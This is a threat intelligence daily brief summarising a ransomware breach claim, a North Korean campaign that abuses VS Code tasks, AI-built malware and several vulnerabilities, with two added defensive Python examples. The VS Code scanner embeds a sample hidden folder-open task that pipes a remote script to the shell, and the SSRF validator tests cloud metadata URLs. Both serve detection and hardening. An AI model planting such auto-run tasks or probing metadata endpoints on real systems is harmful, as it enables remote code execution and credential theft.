ZeroFox Daily Intelligence Brief - January 21, 2026
by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- RansomHouse Claims Breach Tied to Apple and Nvidia Contractor
- North Korean Threat Actors Deploying Malware via Malicious VS Code Projects
- Newly Discovered VoidLink Malware Reportedly Generated Using AI
RansomHouse Claims Breach Tied to Apple and Nvidia Contractor
Source: https://hackread.com/ransomhouse-data-breach-apple-contractor-luxshare/
What we know: The ransomware and extortion group RansomHouse claims to have leaked files associated with Apple, obtained through a breach at Apple's Chinese manufacturing partner Luxshare Precision Industry. The group also claims that data belonging to NVIDIA, Meta, and Qualcomm, among others, was compromised.
Context: RansomHouse first listed Luxshare as a victim on January 9. On January 20, ZeroFox observed that the post had been updated with two onion download links offered as samples. RansomHouse is suspected to be an offshoot of the Babuk ransomware group, with alleged links to Russia and Eastern Europe.
Analyst note: The veracity of RansomHouse's claims cannot be established until either Luxshare confirms the breach or the sample data is verified. If the claims hold, the consequences would very likely be far-reaching, including national security implications for multiple countries, because the alleged data involves semiconductor companies such as Nvidia and Qualcomm. The claimed entry point is a manufacturing partner rather than the named companies themselves, which makes this a supply-chain exposure: the affected firms' own perimeter controls would not have prevented it.
North Korean Threat Actors Deploying Malware via Malicious VS Code Projects
Source: https://thehackernews.com/2026/01/north-korea-linked-hackers-target.html
What we know: North Korean threat actors are reportedly using malicious Visual Studio Code (VS Code) projects as part of fake job assessments to deliver a backdoor with remote code execution (RCE) capabilities on the target system.
Context: Victims are instructed to clone repositories hosted on GitHub, GitLab, or Bitbucket and open them in VS Code. The threat actors abuse VS Code task configuration files (.vscode/tasks.json) to deploy the BeaverTail and InvisibleFerret malware strains. This latest tactic is part of a long-running campaign, tracked as Contagious Interview, that weaponizes the job application process.
Analyst note: Software engineers in the fintech sector are increasingly targeted by North Korean threat actors, likely because a developer workstation provides access to financial assets, proprietary source code, and the internal systems of fintech firms. Compromised systems are very likely to result in financial and intellectual property theft.
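The mechanism behind this tactic is VS Code's automatic task feature: a task in .vscode/tasks.json with `runOptions.runOn` set to `folderOpen` executes when the folder is opened in a trusted workspace. The source does not show the attackers' actual file; the following is an added example (not the campaign's code) that scans a cloned repository for such auto-run tasks before anyone opens it in VS Code. The sample tasks.json, the placeholder command and IP, and the helper names `strip_jsonc`, `find_auto_run_tasks` and `scan_repo` are constructed for this example.

```python
"""Added example, not the attackers' tasks.json (which the source does not show):
flag VS Code tasks that run automatically on folder open. Helper names are
hypothetical; the sample file and its command/IP are constructed placeholders."""
import json
import os
import re

# Constructed sample. runOptions.runOn = "folderOpen" is the real VS Code mechanism
# that launches a task when a trusted folder is opened; the command is a placeholder.
SAMPLE_TASKS_JSON = r'''{
  // looks like a harmless dev-setup task
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -s http://203.0.113.10/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never", "echo": false },
    },
    { "label": "build", "type": "shell", "command": "npm run build" }
  ]
}'''


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas (VS Code's JSONC dialect)
    without touching string contents, so json.loads() accepts the result."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped character (e.g. \")
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j          # the newline itself is kept
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing commas before } or ]; a ", }" inside a command string would also
    # be touched, which is harmless for a scanner that only reports.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def find_auto_run_tasks(tasks_json_text: str) -> list:
    """Return one finding per task that VS Code would run on folder open."""
    data = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        commands = []
        if task.get("command"):
            commands.append(" ".join([str(task["command"]), *map(str, task.get("args", []))]))
        for os_key in ("windows", "linux", "osx"):     # per-OS command overrides
            override = task.get(os_key) or {}
            if override.get("command"):
                commands.append(f"{os_key}: {override['command']}")
        presentation = task.get("presentation") or {}
        findings.append({
            "label": task.get("label"),
            "type": task.get("type"),
            "commands": commands,
            "hidden": presentation.get("reveal") == "never",   # terminal never shown
        })
    return findings


def scan_repo(root: str) -> list:
    """Walk a checkout and collect (path, finding) for every .vscode/tasks.json."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in files:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8-sig") as fh:
                for finding in find_auto_run_tasks(fh.read()):
                    hits.append((path, finding))
    return hits


if __name__ == "__main__":
    for finding in find_auto_run_tasks(SAMPLE_TASKS_JSON):
        print("auto-run task:", finding)
```

Run `scan_repo` against a fresh clone before opening it; any hit with `hidden: True` deserves particular suspicion because the task's terminal output is suppressed. The scan is a pre-open check, not a substitute for the Workspace Trust prompt: keep untrusted folders in Restricted Mode, and consider setting `task.allowAutomaticTasks` to `off` in user settings so that no folder-open task runs without an explicit choice.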
Newly Discovered VoidLink Malware Reportedly Generated Using AI
What we know: VoidLink, a newly discovered malware framework, was reportedly developed with the help of a legitimate AI coding assistant called TRAE SOLO. Researchers assess that it was built by a single threat actor and reached a working state within about a week.
Context: VoidLink is a cloud-native Linux malware framework, featuring 37 malicious plugins, custom loaders, implants, and rootkit capabilities. At the time of writing, there have been no confirmed active infections.
Analyst note: VoidLink's discovery suggests that fully functional malware can now be developed with the assistance of legitimate AI tools, without a conventional development team. Its AI-assisted development is likely to encourage other threat actors to build their own malware the same way, enhancing their capabilities and accelerating the proliferation of malware strains for both mass-scale and customized attacks.
DEEP AND DARK WEB INTELLIGENCE
Telegram user Infrastructure Destruction Squad: The threat group Infrastructure Destruction Squad (IDS) claims to have breached the control system of a solar power plant in Italy. IDS alleges access to the plant's solar tracker control system, which manages and monitors the solar arrays in a live operational environment. If the claim is true, the plant's controls could be manipulated to reduce energy output, force shutdowns, or cause intermittent outages. The claim has not been independently verified.
VULNERABILITY AND EXPLOIT INTELLIGENCE
CVE-2026-22219: CVE-2026-22219 is a server-side request forgery (SSRF) vulnerability in Chainlit. When exploited, it can expose cloud credentials (for example, by reaching a cloud provider's instance metadata service from the vulnerable host) and enable lateral movement within cloud infrastructure. Threat actors are likely to target exposed Chainlit deployments to steal sensitive user and proprietary data.
Affected products: Chainlit versions 0 through 2.9.4
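The credential-theft path in an SSRF of this kind usually runs through the cloud provider's instance metadata endpoint. The following is an added example, not Chainlit's code and not the fix for CVE-2026-22219, showing the check a server-side URL-fetching feature should apply before making an outbound request: resolve the host once, refuse anything that is not a public address (loopback, link-local including 169.254.169.254 and the IPv6 metadata address, RFC 1918, the 100.64.0.0/10 shared range, IPv4-mapped IPv6 forms), and hand the pinned addresses back to the caller. The names `UnsafeUrl`, `validate_outbound_url`, `is_safe_url`, `demo_resolver` and the `DEMO_DNS` table are hypothetical and constructed for this example.

```python
"""Added example, not Chainlit's code: a server-side URL check that blocks the
SSRF-to-cloud-credentials path. Helper names are hypothetical; the DNS table is
constructed so the example runs offline."""
import ipaddress
import socket
from urllib.parse import urlparse


class UnsafeUrl(ValueError):
    """Raised when a user-supplied URL must not be fetched from the server."""


# Constructed DNS answers (not real records) standing in for socket.getaddrinfo.
DEMO_DNS = {
    "example.com": "93.184.216.34",
    "metadata.internal": "169.254.169.254",   # alias pointing at the metadata service
    "2130706433": "127.0.0.1",                # decimal form of 127.0.0.1 resolves to loopback
}


def demo_resolver(host, port, *_args):
    """Mimics socket.getaddrinfo's return shape using DEMO_DNS."""
    if host not in DEMO_DNS:
        raise socket.gaierror(f"constructed resolver: unknown host {host}")
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (DEMO_DNS[host], port))]


def is_blocked_address(ip) -> bool:
    """True for any address a server-side fetch must never reach."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                   # ::ffff:169.254.169.254 -> 169.254.169.254
    # is_global is False for loopback, link-local (incl. 169.254.169.254), RFC 1918,
    # shared space 100.64.0.0/10, ULA fc00::/7 (incl. fd00:ec2::254) and unspecified.
    return (not ip.is_global) or ip.is_multicast


def validate_outbound_url(url: str, resolver=socket.getaddrinfo) -> list:
    """Return the pinned list of IP strings the caller may connect to, or raise UnsafeUrl.

    Resolution happens exactly once, here. The caller should connect to the returned
    addresses (sending the original Host header) instead of resolving the name again;
    re-resolving reopens the DNS-rebinding window between check and fetch.
    """
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        raise UnsafeUrl(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise UnsafeUrl("no host in URL")
    if parts.username or parts.password:
        raise UnsafeUrl("userinfo in URL")     # http://trusted.example@169.254.169.254/
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError as exc:
        raise UnsafeUrl("invalid port") from exc
    try:
        targets = [ipaddress.ip_address(parts.hostname)]   # literal IPv4 / bracketed IPv6
    except ValueError:
        try:
            answers = resolver(parts.hostname, port, 0, socket.SOCK_STREAM)
        except socket.gaierror as exc:
            raise UnsafeUrl(f"cannot resolve {parts.hostname}") from exc
        targets = [ipaddress.ip_address(a[4][0]) for a in answers]
    bad = [str(ip) for ip in targets if is_blocked_address(ip)]
    if bad or not targets:
        raise UnsafeUrl(f"{parts.hostname} resolves to non-public address(es): {bad}")
    return [str(ip) for ip in targets]


def is_safe_url(url: str, resolver=socket.getaddrinfo) -> bool:
    """Boolean wrapper around validate_outbound_url."""
    try:
        validate_outbound_url(url, resolver)
        return True
    except UnsafeUrl:
        return False


if __name__ == "__main__":
    for candidate in ("https://example.com/report.pdf",
                      "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                      "http://metadata.internal/computeMetadata/v1/",
                      "http://2130706433/"):
        print(candidate, "->", "allowed" if is_safe_url(candidate, demo_resolver) else "blocked")
```

A denylist of metadata IPs alone is not enough: the decimal, IPv6-mapped and rebinding cases above all bypass a check that only compares the URL string against 169.254.169.254. Pairing this check with IMDSv2-style hop limits or token requirements on the cloud side, and with egress filtering from the application host, limits the damage if the application-level check is ever bypassed.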
Cloudflare vulnerability: Cloudflare fixed a flaw in its ACME HTTP-01 validation logic that could allow attackers to bypass security controls and reach customer origin servers. The issue reportedly stemmed from how edge requests to a directory were handled. Before the fix, threat actors could have used the flaw to bypass Cloudflare protections and reach origin servers directly to conduct reconnaissance and establish persistence. Because the fix was applied on Cloudflare's edge, customers have nothing to patch, but the incident is a reminder that origin servers should enforce their own authentication and access controls rather than relying solely on edge-level protections.
Affected products: Cloudflare's edge handling of ACME (Automatic Certificate Management Environment) HTTP-01 validation requests, now fixed
Tags: DIB, tlp:green